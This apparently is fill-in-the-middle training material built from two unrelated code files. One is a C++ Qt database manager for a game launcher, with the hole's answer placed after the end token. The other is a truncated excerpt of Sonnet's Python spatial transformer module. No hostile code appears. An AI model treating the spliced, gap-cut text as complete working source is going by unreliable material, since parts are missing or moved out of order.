QByteArray DbManager::getPlatformImage(QString platform)
/*Provided a platform name, this function returns its image byte array.
*/
{
QByteArray PlatformImage;
QSqlQuery query;
query.prepare("SELECT image_path FROM platform WHERE platform=:platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
PlatformImage = query.value(0).toByteArray();
}
}
else
{
qDebug() << "getPlatformImage error: " << query.lastError().text();
}
return PlatformImage;
}
QString DbManager::getPlatformInfo(QString platform)
/*Provided a platform name, this function returns its platform_info.
*/
{
QString PlatformInfo("");
QSqlQuery query;
query.prepare("SELECT platform_info FROM platform WHERE platform=:platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
PlatformInfo = query.value(0).toString();
qDebug(qUtf8Printable(PlatformInfo));
}
}
else
{
qDebug() << "getPlatformInfo error: " << query.lastError().text();
}
return PlatformInfo;
}
int DbManager::getPlatformGameCounter(QString platform)
/*Provided a platform name, this function returns its game_counter.
*/
{
int gameCounter;
QSqlQuery query;
query.prepare("SELECT game_counter FROM platform WHERE platform=:platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
gameCounter = query.value(0).toInt();
qDebug(qUtf8Printable(QString::number(gameCounter)));
}
}
else
{
qDebug() << "getPlatformGameCounter error: " << query.lastError().text();
}
return gameCounter;
}
QString DbManager::getPlatformEmulator(QString platform)
/*Provided a platform name, this function returns its emulator_name.
*/
{
QString PlatformEmulator("");
QSqlQuery query;
query.prepare("SELECT emulator_name FROM platform WHERE platform=:platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
PlatformEmulator = query.value(0).toString();
qDebug(qUtf8Printable(PlatformEmulator));
}
}
else
{
qDebug() << "getPlatformEmulator error: " << query.lastError().text();
}
return PlatformEmulator;
}
QString DbManager::getPlatformTimePlayed(QString platform)
/*Provided a platform name, this function returns its time_played.
*/
{
QString timePlayed("");
QSqlQuery query;
query.prepare("SELECT time_played FROM platform WHERE platform=:platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
timePlayed = query.value(0).toString();
qDebug(qUtf8Printable(timePlayed));
}
}
else
{
qDebug() << "getPlatformTimePlayed error: " << query.lastError().text();
}
return timePlayed;
}
QString DbManager::getPlatformLastPlayed(QString platform)
/*Provided a platform name, this function returns its last_played.
*/
{
QString lastPlayed("");
QSqlQuery query;
query.prepare("SELECT last_played FROM platform WHERE platform=:platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
lastPlayed = query.value(0).toString();
qDebug(qUtf8Printable(lastPlayed));
}
}
else
{
qDebug() << "getPlatformLastPlayed error: " << query.lastError().text();
}
return lastPlayed;
}
int DbManager::getPlatformOpenedCounter(QString platform)
{
int openedCounter=-1;
QSqlQuery query;
query.prepare("SELECT opened_counter FROM platform WHERE platform=:platform;");
query.bindValue(":platform",platform);
if(query.exec())
{
while (query.next())
{
openedCounter = query.value(0).toInt();
qDebug(qUtf8Printable(QString::number(openedCounter)));
}
}
else
{
qDebug() << "getPlatformOpenedCounter error: " << query.lastError().text();
}
return openedCounter;
}
bool DbManager::setPlatformEmulator(QString platform, QString emulatorName)
//Provided a platform and an emulator_name, this function sets it.
{
if (platform=="PC")
{
return true;
}
bool success = false;
QSqlQuery query;
query.prepare("UPDATE platform SET emulator_name=:emulator_name WHERE platform=:platform;");
query.bindValue(":platform",platform);
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setPlatformEmulator error: " << query.lastError().text();
}
return success;
}
bool DbManager::setPlatformOpenedCounter(QString platform, int openedCounter)
//Provided a game id and timePlayed, this function sets the time_played.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE platform SET opened_counter=:opened_counter WHERE platform=:platform;");
query.bindValue(":opened_counter",openedCounter);
query.bindValue(":platform",platform);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setPlatformOpenedCounter error: " << query.lastError().text();
}
return success;
}
//=============================================================================================================================
//=================================================EMULATOR TABLE OPERATIONS===================================================
//=============================================================================================================================
bool DbManager::addEmulatorEntry(QString emulatorName,QString emulatorPath)
/*Provided an emulator, this function adds it to the emulator table.
*/
{
bool success = false;
QSqlQuery query;
query.prepare("INSERT INTO emulator (emulator_name,path,opened_counter) VALUES (:emulator_name,:path,:opened_counter)");
query.bindValue(":emulator_name",emulatorName);
query.bindValue(":path",emulatorPath);
query.bindValue(":opened_counter",0);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "addEmulatorEntry error: " << query.lastError().text();
}
return success;
}
bool DbManager::deleteEmulatorEntry(QString emulatorName)
/*Provided an emulator name, this function removes it from the emulator table(and therefore from the database).
*/
{
bool success = false;
QSqlQuery query;
query.prepare("DELETE FROM emulator WHERE emulator_name = :emulator_name;");
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "deleteEmulatorEntry error: " << query.lastError().text();
}
return success;
}
QByteArray DbManager::getEmulatorImage(QString emulatorName)
{
/*Provided a emulator_name, this function returns its image byte array.
*/
{
QByteArray EmulatorImage;
QSqlQuery query;
query.prepare("SELECT image_path FROM emulator WHERE emulator_name=:emulator_name;");
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
while (query.next())
{
EmulatorImage = query.value(0).toByteArray();
}
}
else
{
qDebug() << "getEmulatorImage error: " << query.lastError().text();
}
return EmulatorImage;
}
}
QString DbManager::getEmulatorInfo(QString emulatorName)
{
/*Provided a emulator_name, this function returns its emulator_info.
*/
{
QString EmulatorInfo("");
QSqlQuery query;
query.prepare("SELECT emulator_info FROM emulator WHERE emulator_name=:emulator_name;");
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
while (query.next())
{
EmulatorInfo = query.value(0).toString();
qDebug(qUtf8Printable(EmulatorInfo));
}
}
else
{
qDebug() << "getEmulatorInfo error: " << query.lastError().text();
}
return EmulatorInfo;
}
}
QString DbManager::getEmulatorPath(QString emulatorName)
/*Provided a emulator_name, this function returns its path.
*/
{
QString EmulatorPath("");
QSqlQuery query;
query.prepare("SELECT path FROM emulator WHERE emulator_name=:emulator_name;");
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
while (query.next())
{
EmulatorPath = query.value(0).toString();
qDebug(qUtf8Printable(EmulatorPath));
}
}
else
{
qDebug() << "getEmulatorPath error: " << query.lastError().text();
}
return EmulatorPath;
}
QString DbManager::getEmulatorTimePlayed(QString emulatorName)
/*Provided a emulator_name, this function returns its timeplayed.
*/
{
QString timePlayed("");
QSqlQuery query;
query.prepare("SELECT time_played FROM emulator WHERE emulator_name=:emulator_name;");
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
while (query.next())
{
timePlayed = query.value(0).toString();
qDebug(qUtf8Printable(timePlayed));
}
}
else
{
qDebug() << "getEmulatorTimePlayed error: " << query.lastError().text();
}
return timePlayed;
}
QString DbManager::getEmulatorLastPlayed(QString emulatorName)
/*Provided a emulator_name, this function returns its last_played.
*/
{
QString lastPlayed("");
QSqlQuery query;
query.prepare("SELECT last_played FROM emulator WHERE emulator_name=:emulator_name;");
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
while (query.next())
{
lastPlayed = query.value(0).toString();
qDebug(qUtf8Printable(lastPlayed));
}
}
else
{
qDebug() << "getEmulatorLastPlayed error: " << query.lastError().text();
}
return lastPlayed;
}
QStringList DbManager::getAllEmulators()
{
QStringList allEmulators;
QSqlQuery query;
query.prepare("SELECT emulator_name FROM emulator;");
if(query.exec())
{
while (query.next())
{
allEmulators.append(query.value(0).toString());
}
}
else
{
qDebug() << "getAllEmulators error: " << query.lastError().text();
}
return allEmulators;
}
<|fim▁hole|>{
int openedCounter=-1;
QSqlQuery query;
query.prepare("SELECT opened_counter FROM emulator WHERE emulator_name=:emulator_name;");
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
while (query.next())
{
openedCounter = query.value(0).toInt();
qDebug(qUtf8Printable(QString::number(openedCounter)));
}
}
else
{
qDebug() << "getEmulatorOpenedCounter error: " << query.lastError().text();
}
return openedCounter;
}
bool DbManager::setEmulatorPath(QString emulatorName, QString path)
//Provided an emulator_name and its path, this function sets it.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE emulator SET path=:path WHERE emulator_name=:emulator_name");
query.bindValue(":path",path);
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setEmulatorPath error: " << query.lastError().text();
}
return success;
}
bool DbManager::setEmulatorOpenedCounter(QString emulatorName, int openedCounter)
//Provided a game id and timePlayed, this function sets the time_played.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE emulator SET opened_counter=:opened_counter WHERE emulator_name=:emulator_name;");
query.bindValue(":opened_counter",openedCounter);
query.bindValue(":emulator_name",emulatorName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setEmulatorOpenedCounter error: " << query.lastError().text();
}
return success;
}
bool DbManager::addExternalSoftwareEntry(QString externalSoftwareName)
/*Provided an emulator, this function adds it to the emulator table.
*/
{
bool success = false;
QSqlQuery query;
query.prepare("INSERT INTO extsoft (software_name,opened_counter) VALUES (:software_name,:opened_counter)");
query.bindValue(":software_name",externalSoftwareName);
query.bindValue(":opened_counter",0);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "addExternalSoftwareEntry error: " << query.lastError().text();
}
return success;
}
bool DbManager::deleteExternalSoftwareEntry(QString externalSoftwareName)
/*Provided an emulator name, this function removes it from the emulator table(and therefore from the database).
*/
{
bool success = false;
QSqlQuery query;
query.prepare("DELETE FROM extsoft WHERE software_name = :software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "deleteExternalSoftwareEntry error: " << query.lastError().text();
}
return success;
}
QStringList DbManager::getAllExternalSoftwares()
{
QStringList allSoftwares;
QSqlQuery query;
query.prepare("SELECT software_name FROM extsoft;");
if(query.exec())
{
while (query.next())
{
allSoftwares.append(query.value(0).toString());
}
}
else
{
qDebug() << "getAllExternalSoftwares error: " << query.lastError().text();
}
return allSoftwares;
}
QString DbManager::getExternalSoftwarePath(QString externalSoftwareName)
/*Provided a game id, this function returns its path.
*/
{
QString path("");
QSqlQuery query;
query.prepare("SELECT path FROM extsoft WHERE software_name=:software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while (query.next())
{
path = query.value(0).toString();
qDebug(qUtf8Printable(path));
}
}
else
{
qDebug() << "getExternalSoftwarePath error: " << query.lastError().text();
}
return path;
}
bool DbManager::getExternalSoftwareSupportedBool(QString externalSoftwareName)
{
bool supported = false;
QSqlQuery query;
query.prepare("SELECT supported_extsoft FROM extsoft WHERE software_name=:software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while(query.next())
{
supported = query.value(0).toBool();
qDebug(qUtf8Printable(QString::number(supported)));
}
}
else
{
qDebug() << "getExternalSoftwareSupportedBool error : " << query.lastError().text();
}
return supported;
}
int DbManager::getExternalSoftwareOpenedCounter(QString externalSoftwareName)
{
int openedCounter=-1;
QSqlQuery query;
query.prepare("SELECT opened_counter FROM extsoft WHERE software_name=:software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while (query.next())
{
openedCounter = query.value(0).toInt();
qDebug(qUtf8Printable(QString::number(openedCounter)));
}
}
else
{
qDebug() << "getExternalSoftwareOpenedCounter error: " << query.lastError().text();
}
return openedCounter;
}
QList<int> DbManager::getExternalSoftwareGamesWhitelist(QString externalSoftwareName)
{
QList<int> gamesWhitelist;
QString result;
QSqlQuery query;
query.prepare("SELECT games_whitelist FROM extsoft WHERE software_name=:software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while(query.next())
{
result = query.value(0).toString();
foreach(QString gameId,result.split('|'))
{
gamesWhitelist.append(gameId.toInt());
}
}
}
else
{
qDebug() << "getExternalSoftwareGamesWhitelist error : " << query.lastError().text();
}
return gamesWhitelist;
}
QList<int> DbManager::getExternalSoftwareGamesOffList(QString externalSoftwareName)
{
QList<int> gamesOffList;
QString result;
QSqlQuery query;
query.prepare("SELECT games_off_list FROM extsoft WHERE software_name=:software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while(query.next())
{
result = query.value(0).toString();
foreach(QString gameId,result.split('|'))
{
gamesOffList.append(gameId.toInt());
}
}
}
else
{
qDebug() << "getExternalSoftwareGamesOffList error : " << query.lastError().text();
}
return gamesOffList;
}
QStringList DbManager::getExternalSoftwarePlatformsOnList(QString externalSoftwareName)
{
QStringList platformsOnList;
QSqlQuery query;
query.prepare("SELECT platforms_on_list FROM extsoft WHERE software_name=:software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while(query.next())
{
platformsOnList = query.value(0).toString().split('|');
}
}
else
{
qDebug() << "getExternalSoftwarePlatormsOnList error : " << query.lastError().text();
}
return platformsOnList;
}
bool DbManager::getExternalSoftwareGameCanRun(QString extSoftName, int gameId){
bool gameswhitelisted = getExternalSoftwareGamesWhitelist(extSoftName).contains(gameId);
bool gamesoff = getExternalSoftwareGamesOffList(extSoftName).contains(gameId);
bool platformon = getExternalSoftwarePlatformsOnList(extSoftName).contains(getGamePlatform(gameId));
if (gameswhitelisted){
return true;
}
else if(gamesoff){
return false;
}
else if(platformon){
return true;
}
return false;
}
bool DbManager::getExternalSoftwareMutliInstance(QString externalSoftwareName){
bool state = false;
QSqlQuery query;
query.prepare("SELECT multi_instance FROM extsoft WHERE software_name=:software_name;");
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
while (query.next())
{
state = query.value(0).toBool();
}
}
else
{
qDebug() << "getExternalSoftwareMultiInstance error: " << query.lastError().text();
}
return state;
}
bool DbManager::setExternalSoftwareGamesWhitelist(QString externalSoftwareName, QList<int> gamesWhitelist)
{
QString gamesWhitelistDB;
foreach(int gameId, gamesWhitelist)
{
gamesWhitelistDB += QString::number(gameId)+"|";
}
gamesWhitelistDB.chop(1);
bool success = false;
QSqlQuery query;
query.prepare("UPDATE extsoft SET games_whitelist=:games_whitelist WHERE software_name=:software_name;");
query.bindValue(":games_whitelist",gamesWhitelistDB);
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setExternalSoftwareGamesWhitelist error: " << query.lastError().text();
}
return success;
}
bool DbManager::setExternalSoftwareGamesOffList(QString externalSoftwareName, QList<int> gamesOffList)
{
QString gamesOffListDB;
foreach(int gameId, gamesOffList)
{
gamesOffListDB += QString::number(gameId)+"|";
}
gamesOffListDB.chop(1);
bool success = false;
QSqlQuery query;
query.prepare("UPDATE extsoft SET games_off_list=:games_off_list WHERE software_name=:software_name;");
query.bindValue(":games_off_list",gamesOffListDB);
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setExternalSoftwareGamesOffList error: " << query.lastError().text();
}
return success;
}
bool DbManager::setExternalSoftwarePlatformsOnList(QString externalSoftwareName, QStringList platformsOnList)
{
QStringList list;
bool success = false;
QSqlQuery query;
query.prepare("UPDATE extsoft SET platforms_on_list=:platforms_on_list WHERE software_name=:software_name;");
query.bindValue(":platforms_on_list",QString(platformsOnList.join('|')));
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setExternalSoftwarePlatformsOnList error: " << query.lastError().text();
}
return success;
}
bool DbManager::setExternalSoftwarePath(QString externalSoftwareName, QString path)
//Provided an emulator_name and its path, this function sets it.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE extsoft SET path=:path WHERE software_name=:software_name;");
query.bindValue(":path",path);
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setExternalSoftwarePath error: " << query.lastError().text();
}
return success;
}
bool DbManager::setExternalSoftwareSupportedBool(QString externalSoftwareName, bool supported)
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE extsoft SET supported_extsoft=:supported_extsoft WHERE software_name=:software_name;");
query.bindValue(":supported_extsoft",supported);
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setExternalSoftwareSupportedBool error: " << query.lastError().text();
}
return success;
}
bool DbManager::setExternalSoftwareOpenedCounter(QString externalSoftwareName, int openedCounter)
//Provided a game id and timePlayed, this function sets the time_played.
{
bool success = false;
QSqlQuery query;
query.prepare("UPDATE extsoft SET opened_counter=:opened_counter WHERE software_name=:software_name;");
query.bindValue(":opened_counter",openedCounter);
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setExternalSoftwareOpenedCounter error: " << query.lastError().text();
}
return success;
}
bool DbManager::setExternalSoftwareMutliInstance(QString externalSoftwareName, bool state){
bool success = false;
QSqlQuery query;
query.prepare("UPDATE extsoft SET multi_instance=:multi_instance WHERE software_name=:software_name;");
query.bindValue(":multi_instance",state);
query.bindValue(":software_name",externalSoftwareName);
if(query.exec())
{
success = true;
}
else
{
qDebug() << "setExternalSoftwareMultiInstance error: " << query.lastError().text();
}
return success;
}<|fim▁end|>
|
int DbManager::getEmulatorOpenedCounter(QString emulatorName)
|
<|file_name|>spatial_transformer.py<|end_file_name|><|fim▁begin|># Copyright 2017 The Sonnet Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""""Implementation of Spatial Transformer networks core components."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
from itertools import chain
# Dependency imports
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from sonnet.python.modules import base
from sonnet.python.modules import basic
import tensorflow as tf
class GridWarper(base.AbstractModule):
"""Grid warper interface class.
An object implementing the `GridWarper` interface generates a reference grid
of feature points at construction time, and warps it via a parametric
transformation model, specified at run time by an input parameter Tensor.
Grid warpers must then implement a `create_features` function used to generate
the reference grid to be warped in the forward pass (according to a determined
warping model).
"""
def __init__(self, source_shape, output_shape, num_coeff, name, **kwargs):
"""Constructs a GridWarper module and initializes the source grid params.
`source_shape` and `output_shape` are used to define the size of the source
and output signal domains, as opposed to the shape of the respective
Tensors. For example, for an image of size `width=W` and `height=H`,
`{source,output}_shape=[H, W]`; for a volume of size `width=W`, `height=H`
and `depth=D`, `{source,output}_shape=[H, W, D]`.
Args:
source_shape: Iterable of integers determining the size of the source
signal domain.
output_shape: Iterable of integers determining the size of the destination
resampled signal domain.
num_coeff: Number of coefficients parametrizing the grid warp.
For example, a 2D affine transformation will be defined by the 6
parameters populating the corresponding 2x3 affine matrix.
name: Name of Module.
**kwargs: Extra kwargs to be forwarded to the `create_features` function,
instantiating the source grid parameters.
Raises:
Error: If `len(output_shape) > len(source_shape)`.
TypeError: If `output_shape` and `source_shape` are not both iterable.
"""
super(GridWarper, self).__init__(name=name)
self._source_shape = tuple(source_shape)
self._output_shape = tuple(output_shape)<|fim▁hole|> 'smaller than source domain dimensionality ({})'
.format(len(self._output_shape),
len(self._source_shape)))
self._num_coeff = num_coeff
self._psi = self._create_features(**kwargs)
@abc.abstractmethod
def _create_features(self, **kwargs):
"""Generates matrix of features, of size `[num_coeff, num_points]`."""
pass
@property
def n_coeff(self):
"""Returns number of coefficients of warping function."""
return self._n_coeff
@property
def psi(self):
"""Returns a list of features used to compute the grid warp."""
return self._psi
@property
def source_shape(self):
"""Returns a tuple containing the shape of the source signal."""
return self._source_shape
@property
def output_shape(self):
"""Returns a tuple containing the shape of the output grid."""
return self._output_shape
def _create_affine_features(output_shape, source_shape):
"""Generates n-dimensional homogenous coordinates for a given grid definition.
`source_shape` and `output_shape` are used to define the size of the source
and output signal domains, as opposed to the shape of the respective
Tensors. For example, for an image of size `width=W` and `height=H`,
`{source,output}_shape=[H, W]`; for a volume of size `width=W`, `height=H`
and `depth=D`, `{source,output}_shape=[H, W, D]`.
Args:
output_shape: Iterable of integers determining the shape of the grid to be
warped.
source_shape: Iterable of integers determining the domain of the signal to be
resampled.
Returns:
List of flattened numpy arrays of coordinates in range `[-1, 1]^N`, for
example:
```
[[x_0_0, .... , x_0_{n-1}],
....
[x_{M-1}_0, .... , x_{M-1}_{n-1}],
[x_{M}_0=0, .... , x_{M}_{n-1}=0],
...
[x_{N-1}_0=0, .... , x_{N-1}_{n-1}=0],
[1, ..., 1]]
```
where N is the dimensionality of the sampled space, M is the
dimensionality of the output space, i.e. 2 for images
and 3 for volumes, and n is the number of points in the output grid.
When the dimensionality of `output_shape` is smaller that that of
`source_shape` the last rows before [1, ..., 1] will be filled with 0.
"""
ranges = [np.linspace(-1, 1, x, dtype=np.float32)
for x in reversed(output_shape)]
psi = [x.reshape(-1) for x in np.meshgrid(*ranges, indexing='xy')]
dim_gap = len(source_shape) - len(output_shape)
for _ in xrange(dim_gap):
psi.append(np.zeros_like(psi[0], dtype=np.float32))
psi.append(np.ones_like(psi[0], dtype=np.float32))
return psi
class AffineGridWarper(GridWarper):
"""Affine Grid Warper class.
The affine grid warper generates a reference grid of n-dimensional points
and warps it via an affine transormation model determined by an input
parameter Tensor. Some of the transformation parameters can be fixed at
construction time via an `AffineWarpConstraints` object.
"""
def __init__(self,
source_shape,
output_shape,
constraints=None,
name='affine_grid_warper'):
"""Constructs an AffineGridWarper.
`source_shape` and `output_shape` are used to define the size of the source
and output signal domains, as opposed to the shape of the respective
Tensors. For example, for an image of size `width=W` and `height=H`,
`{source,output}_shape=[H, W]`; for a volume of size `width=W`, `height=H`
and `depth=D`, `{source,output}_shape=[H, W, D]`.
Args:
source_shape: Iterable of integers determining the size of the source
signal domain.
output_shape: Iterable of integers determining the size of the destination
resampled signal domain.
constraints: Either a double list of shape `[N, N+1]` defining constraints
on the entries of a matrix defining an affine transformation in N
dimensions, or an `AffineWarpConstraints` object. If the double list is
passed, a numeric value bakes in a constraint on the corresponding
entry in the tranformation matrix, whereas `None` implies that the
corresponding entry will be specified at run time.
name: Name of module.
Raises:
Error: If constraints fully define the affine transformation; or if
input grid shape and contraints have different dimensionality.
TypeError: If output_shape and source_shape are not both iterable.
"""
self._source_shape = tuple(source_shape)
self._output_shape = tuple(output_shape)
num_dim = len(source_shape)
if isinstance(constraints, AffineWarpConstraints):
self._constraints = constraints
elif constraints is None:
self._constraints = AffineWarpConstraints.no_constraints(num_dim)
else:
self._constraints = AffineWarpConstraints(constraints=constraints)
if self._constraints.num_free_params == 0:
raise base.Error('Transformation is fully constrained.')
if self._constraints.num_dim != num_dim:
raise base.Error('Incompatible set of constraints provided: '
'input grid shape and constraints have different '
'dimensionality.')
super(AffineGridWarper, self).__init__(source_shape=source_shape,
output_shape=output_shape,
num_coeff=6,
name=name,
constraints=self._constraints)
def _create_features(self, constraints):
"""Creates all the matrices needed to compute the output warped grids."""
affine_warp_constraints = constraints
if not isinstance(affine_warp_constraints, AffineWarpConstraints):
affine_warp_constraints = AffineWarpConstraints(affine_warp_constraints)
mask = affine_warp_constraints.mask
psi = _create_affine_features(output_shape=self._output_shape,
source_shape=self._source_shape)
scales = [(x - 1.0) * .5 for x in reversed(self._source_shape)]
offsets = scales
# Transforming a point x's i-th coordinate via an affine transformation
# is performed via the following dot product:
#
# x_i' = s_i * (T_i * x) + t_i (1)
#
# where Ti is the i-th row of an affine matrix, and the scalars s_i and t_i
# define a decentering and global scaling into the source space.
# In the AffineGridWarper some of the entries of Ti are provided via the
# input, some others are instead fixed, according to the constraints
# assigned in the constructor.
# In create_features the internal dot product (1) is accordingly broken down
# into two parts:
#
# x_i' = Ti[uncon_i] * x[uncon_i, :] + offset(con_var) (2)
#
# i.e. the sum of the dot product of the free parameters (coming
# from the input) indexed by uncond_i and an offset obtained by
# precomputing the fixed part of (1) according to the constraints.
# This step is implemented by analyzing row by row the constraints matrix
# and saving into a list the x[uncon_i] and offset(con_var) data matrices
# for each output dimension.
features = []
for row, scale in zip(mask, scales):
x_i = np.array([x for x, is_active in zip(psi, row) if is_active])
features.append(x_i * scale if len(x_i) else None)
for row_i, row in enumerate(mask):
x_i = None
s = scales[row_i]
for i, is_active in enumerate(row):
if is_active:
continue
# In principle a whole row of the affine matrix can be fully
# constrained. In that case the corresponding dot product between input
# parameters and grid coordinates doesn't need to be implemented in the
# computation graph since it can be precomputed.
# When a whole row if constrained, x_i - which is initialized to
# None - will still be None at the end do the loop when it is appended
# to the features list; this value is then used to detect this setup
# in the build function where the graph is assembled.
if x_i is None:
x_i = np.array(psi[i]) * affine_warp_constraints[row_i][i] * s
else:
x_i += np.array(psi[i]) * affine_warp_constraints[row_i][i] * s
features.append(x_i)
features += offsets
return features
def _build(self, inputs):
"""Assembles the module network and adds it to the graph.
The internal computation graph is assembled according to the set of
constraints provided at construction time.
Args:
inputs: Tensor containing a batch of transformation parameters.
Returns:
A batch of warped grids.
Raises:
Error: If the input tensor size is not consistent with the constraints
passed at construction time.
"""
input_shape = tf.shape(inputs)
input_dtype = inputs.dtype.as_numpy_dtype
batch_size = tf.expand_dims(input_shape[0], 0)
number_of_params = inputs.get_shape()[1]
if number_of_params != self._constraints.num_free_params:
raise base.Error('Input size is not consistent with constraint '
'definition: {} parameters expected, {} provided.'
.format(self._constraints.num_free_params,
number_of_params))
num_output_dimensions = len(self._psi) // 3
def get_input_slice(start, size):
"""Extracts a subset of columns from the input 2D Tensor."""
return basic.SliceByDim([1], [start], [size])(inputs)
warped_grid = []
var_index_offset = 0
number_of_points = np.prod(self._output_shape)
for i in xrange(num_output_dimensions):
if self._psi[i] is not None:
# The i-th output dimension is not fully specified by the constraints,
# the graph is setup to perform matrix multiplication in batch mode.
grid_coord = self._psi[i].astype(input_dtype)
num_active_vars = self._psi[i].shape[0]
active_vars = get_input_slice(var_index_offset, num_active_vars)
warped_coord = tf.matmul(active_vars, grid_coord)
warped_coord = tf.expand_dims(warped_coord, 1)
var_index_offset += num_active_vars
offset = self._psi[num_output_dimensions + i]
if offset is not None:
offset = offset.astype(input_dtype)
# Some entries in the i-th row of the affine matrix were constrained
# and the corresponding matrix multiplications have been precomputed.
tiling_params = tf.concat(
[
batch_size, tf.constant(
1, shape=(1,)), tf.ones_like(offset.shape)
],
0)
offset = offset.reshape((1, 1) + offset.shape)
warped_coord += tf.tile(offset, tiling_params)
else:
# The i-th output dimension is fully specified by the constraints, and
# the corresponding matrix multiplications have been precomputed.
warped_coord = self._psi[num_output_dimensions + i].astype(input_dtype)
tiling_params = tf.concat(
[
batch_size, tf.constant(
1, shape=(1,)), tf.ones_like(warped_coord.shape)
],
0)
warped_coord = warped_coord.reshape((1, 1) + warped_coord.shape)
warped_coord = tf.tile(warped_coord, tiling_params)
warped_coord += self._psi[i + 2 * num_output_dimensions]
# Need to help TF figuring out shape inference since tiling information
# is held in Tensors which are not known until run time.
warped_coord.set_shape([None, 1, number_of_points])
warped_grid.append(warped_coord)
# Reshape all the warped coordinates tensors to match the specified output
# shape and concatenate into a single matrix.
grid_shape = self._output_shape + (1,)
warped_grid = [basic.BatchReshape(grid_shape)(grid) for grid in warped_grid]
return tf.concat(warped_grid, len(grid_shape))
@property
def constraints(self):
return self._constraints
def inverse(self, name=None):
"""Returns a `sonnet` module to compute inverse affine transforms.
The function first assembles a network that given the constraints of the
current AffineGridWarper and a set of input parameters, retrieves the
coefficients of the corresponding inverse affine transform, then feeds its
output into a new AffineGridWarper setup to correctly warp the `output`
space into the `source` space.
Args:
name: Name of module implementing the inverse grid transformation.
Returns:
A `sonnet` module performing the inverse affine transform of a reference
grid of points via an AffineGridWarper module.
Raises:
tf.errors.UnimplementedError: If the function is called on a non 2D
instance of AffineGridWarper.
"""
if self._num_coeff != 6:
raise tf.errors.UnimplementedError('AffineGridWarper currently supports'
'inversion only for the 2D case.')
def _affine_grid_warper_inverse(inputs):
"""Assembles network to compute inverse affine transformation.
Each `inputs` row potentailly contains [a, b, tx, c, d, ty]
corresponding to an affine matrix:
A = [a, b, tx],
[c, d, ty]
We want to generate a tensor containing the coefficients of the
corresponding inverse affine transformation in a constraints-aware
fashion.
Calling M:
M = [a, b]
[c, d]
the affine matrix for the inverse transform is:
A_in = [M^(-1), M^-1 * [-tx, -tx]^T]
where
M^(-1) = (ad - bc)^(-1) * [ d, -b]
[-c, a]
Args:
inputs: Tensor containing a batch of transformation parameters.
Returns:
A tensorflow graph performing the inverse affine transformation
parametrized by the input coefficients.
"""
batch_size = tf.expand_dims(tf.shape(inputs)[0], 0)
constant_shape = tf.concat([batch_size, tf.convert_to_tensor((1,))], 0)
index = iter(range(6))
def get_variable(constraint):
if constraint is None:
i = next(index)
return inputs[:, i:i+1]
else:
return tf.fill(constant_shape, tf.constant(constraint,
dtype=inputs.dtype))
constraints = chain.from_iterable(self.constraints)
a, b, tx, c, d, ty = (get_variable(constr) for constr in constraints)
det = a * d - b * c
a_inv = d / det
b_inv = -b / det
c_inv = -c / det
d_inv = a / det
m_inv = basic.BatchReshape(
[2, 2])(tf.concat([a_inv, b_inv, c_inv, d_inv], 1))
txy = tf.expand_dims(tf.concat([tx, ty], 1), 2)
txy_inv = basic.BatchFlatten()(tf.matmul(m_inv, txy))
tx_inv = txy_inv[:, 0:1]
ty_inv = txy_inv[:, 1:2]
inverse_gw_inputs = tf.concat(
[a_inv, b_inv, -tx_inv, c_inv, d_inv, -ty_inv], 1)
agw = AffineGridWarper(self.output_shape,
self.source_shape)
return agw(inverse_gw_inputs) # pylint: disable=not-callable
if name is None:
name = self.module_name + '_inverse'
